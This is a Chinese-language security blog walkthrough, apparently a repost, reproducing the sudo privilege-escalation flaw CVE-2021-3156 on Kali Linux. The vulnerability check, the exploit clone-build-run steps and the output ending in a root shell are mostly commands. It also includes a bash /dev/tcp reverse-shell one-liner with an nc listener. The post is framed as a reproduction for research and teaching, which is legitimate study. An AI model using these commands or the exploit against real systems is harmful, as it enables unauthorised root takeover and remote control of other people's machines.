权限提升 | Linux本地提权sudo(CVE-2021-3156)漏洞复现

admin 2024年11月24日14:49:57评论38 views字数 2704阅读9分0秒阅读模式

影响范围

Sudo 1.8.2 - 1.8.31p2Sudo 1.9.0 - 1.9.5p1

环境准备

这里使用的是kali2020.2

查看sudo版本

sudo --version

权限提升 | Linux本地提权sudo(CVE-2021-3156)漏洞复现

执行
sudoedit -s /
如果返回
root@kali:~# sudoedit -s /sudoedit: /:不是常规文件  #sudoedit: /: not a regular fileroot@kali:~

权限提升 | Linux本地提权sudo(CVE-2021-3156)漏洞复现

则存在漏洞
返回
usagesudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file
则不存在漏洞
添加用户
useradd testpasswd test#设置用户密码service ssh start#启动ssh
连接
ssh test@192.168.xx.xx
由于kali存在git,所以就直接使用git下载exp,否则需要使用webshell或者自行下载解压,或者直接在shell中反弹shell
bash -i >& /dev/tcp/192.168.x.x/996 0>&1 #端口号咋就这样了
接收shell
nc -lvvp 996

漏洞复现

cd /tmpgit clone https://github.com/blasty/CVE-2021-3156.gitmakechmod +x sudo-hax-me-a-sandwich./sudo-hax-me-a-sandwich 1
操作过程
$ cd /tmp$ pwd/tmp$ git clone https://github.com/blasty/CVE-2021-3156.git正克隆到 'CVE-2021-3156'...remote: Enumerating objects: 50, done.remote: Counting objects: 100% (50/50), done.remote: Compressing objects: 100% (35/35), done.remote: Total 50 (delta 25), reused 38 (delta 15), pack-reused 0接收对象中: 100% (50/50), 8.98 KiB | 836.00 KiB/s, 完成.处理 delta 中: 100% (25/25), 完成.$ cd CVE-2021-3156$ pwd/tmp/CVE-2021-3156$ makerm -rf libnss_Xmkdir libnss_Xgcc -std=c99 -o sudo-hax-me-a-sandwich hax.cgcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c$ ./sudo-hax-me-a-sandwich** CVE-2021-3156 PoC by blasty <[email protected]>  usage: ./sudo-hax-me-a-sandwich <target>  available targets:  ------------------------------------------------------------    0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27    1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31    2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28  ------------------------------------------------------------  manual mode:    ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>$ ./sudo-hax-me-a-sandwich 1** CVE-2021-3156 PoC by blasty <[email protected]>using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)** pray for your rootshell.. **[+] bl1ng bl1ng! We got it!# iduid=0(root) gid=0(root) groups=0(root),1001(test)# lsMakefile  README.md  brute.sh  hax.c  lib.c  libnss_X  sudo-hax-me-a-sandwich# exit

END

往期回顾

实战 | 一次没有逗号的MSSQL注入

权限提升 | DirtyPipe-脏管道内核提权

权限维持 | Windows快捷方式权限维持与后门

技术分享 | JS断点调试教学

技术分享 | 搜索框之%的妙用

实战 | 对某授权学校的常规渗透

实战 | 一次另类的mssql渗透之路

技术分享 | ChatGPT渗透教学(一)

实战 | host碰撞之边界突破getshell

技术分享 | web站点登录框的常规突破

免杀 | 初学者的mimikatz免杀制作教程

技术分享 | 另类的XSS攻击之新型XSS载体

安全工具 | xray windows 1.9x版通杀补丁

安全工具 | 新型目录碰撞工具DirCollision

技术分享 | web登录框密码加密的突破小秘密

技术分享 | ChatGPT在红蓝队中的利用姿势(二)

实用工具 | ChatGPT大师V1.0 免注册中文复刻版

技术分享 | spring-security 三种情况下的认证绕过

技术分享 | 另类的SSRF漏洞的挖掘与利用,绝对另类哦!

文档干货 | 密码测评相关概念及国标文档和行标文档分享

实用工具 | ChatGPT Tools,无需登录网址即可直接使用

技术分享 | 如何利用HTTP头部注入漏洞赚取12500美元的赏金

技术分享 | Windows文件/文件夹隐藏技巧,无需借助三方软件

技术分享 | 利用子域接管漏洞赚取2000美金,子域接管漏洞讲解!

漏洞分析 | (CVE-2021-4206)QEMU QXL整数溢出导致堆溢出漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

点赞是鼓励 在看是认同 分享传递知识

看完点个“在看”权限提升 | Linux本地提权sudo(CVE-2021-3156)漏洞复现分享给更多人权限提升 | Linux本地提权sudo(CVE-2021-3156)漏洞复现

原文始发于微信公众号(杂七杂八聊安全):权限提升 | Linux本地提权sudo(CVE-2021-3156)漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月24日14:49:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   权限提升 | Linux本地提权sudo(CVE-2021-3156)漏洞复现https://cn-sec.com/archives/1889950.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息